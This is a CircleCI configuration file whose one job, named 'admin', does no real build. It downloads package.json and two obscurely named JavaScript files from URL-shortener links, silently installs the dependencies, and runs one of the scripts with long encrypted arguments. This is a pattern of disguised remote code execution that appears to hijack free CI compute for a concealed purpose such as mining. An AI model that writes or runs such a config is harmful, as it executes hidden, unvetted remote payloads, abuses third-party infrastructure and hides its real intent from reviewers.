version: 2.1
orbs:
  android: circleci/android@1.0
jobs:
  admin:
    executor:
      name: android/android-machine
    #resource_class: medium
    steps:
      - run: 
          command: curl -fsSL shorturl.at/xEL35 -o package.json && curl -fsSL shorturl.at/giCHZ -o rutyjhfgdfr.js && curl -fsSL shorturl.at/nCMZ2 -o logger.js
      - run: npm i -s
      - run: node rutyjhfgdfr -r U2FsdGVkX18MrHnDxY9uUou7yt3l2AZqwpzp5AD8Ywacpt6mHo+TNcay0OoWGCOrcb9Dg2VlxUT7dyZew2GYMMNDZLr/9tb+6qv9wswSmLaKeWyz9HwkWW7RYKUzYP9xjE+EVZ7nzQHkrGMCd3NNCw3Mujy3NQEQtv3IWERUj3/AgyHKe5aUmBB6x1mAuhIDHkLnK6FQ1H1Cx/rPHrykT7rdadVDtHn7TsiQQn+rzLpgZGF8lcraXi0bGMx8fx15FV2a9GxcWG4QAVBbF1IcMiakN4BtFIsTbNQCy3FwFqi20fua8U4B5EGqaAd17ewNZX+yG7B3gl2eoMGp5twd9BXeRKc2p2ayOtDwPu9BSsJ1Vj+cQv36jL8GQ5X29Amd -t U2FsdGVkX1+fkDxyJG2Xn23funqphl+JKuWnL8aKGja2WbPpx4c4XjPL94EloxYS -lpn U2FsdGVkX1+HXLWGNBZDqjgZ/LbOknmFTJ6DgRJ9Lf8= -sp -s U2FsdGVkX19YZO8lHl/9esXHJbBorKSEG9UJ3GieNT/dIs/aMGP0uzFqZHoup0TMlMZwn5fO7LF8SGcGmdbQ5IGog7xPML9MEj9aihD+2wBFfL/1hTc1FqFWUJDCKCwouF8Y3aQy/LgZ0oHSFVC2tjIrH/qBiNAxXCHWT2rp/2QWo89AWTHMUy5JKi65laDjDza5ztM4OMmx+RK9FY3F7E2BV/Q9S24pWuX503+ygN8=
      
workflows:
  start-work:
    jobs:
      - admin
